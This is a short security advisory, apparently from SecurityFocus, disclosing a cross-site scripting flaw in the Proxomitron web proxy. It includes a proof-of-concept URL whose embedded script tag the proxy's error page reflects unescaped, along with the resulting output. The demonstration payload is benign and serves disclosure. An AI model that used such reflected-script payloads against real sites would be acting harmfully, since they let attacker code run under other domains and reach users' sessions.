Proxomitron Cross-Site Scripting Vulnerability

"TAKAGI, Hiromitsu" <takagi@etl.go.jp> submitted this example:

Accessing the following URL with the browser configured to use Proxomitron as a proxy,

http://www.example.com:9999/<SCRIPT>document.write(document.domain)</SCRIPT>

it will cause Proxomitron to produce output like this:
========================================================
<html><head><title>The Proxomitron Reveals...</title>
...
The Proxomitron couldn't connect to...<br>
font color=#ffff00 size=+1 > www.example.com:9999/<SCRIPT>document.write(document.domain)</SCRIPT>
</font><br>
The site may be busy or the web server may be down.
...
========================================================

and this will be shown as the following:
========================================================
Error connecting to site
The Proxomitron couldn't connect to...
www.example.com:9999/www.example.com
The site may be busy or the web server may be down.
========================================================

The noteworthy point is that the JavaScript code will be executed on an arbitrary specified domain.


 

Privacy Statement
Copyright 2010, SecurityFocus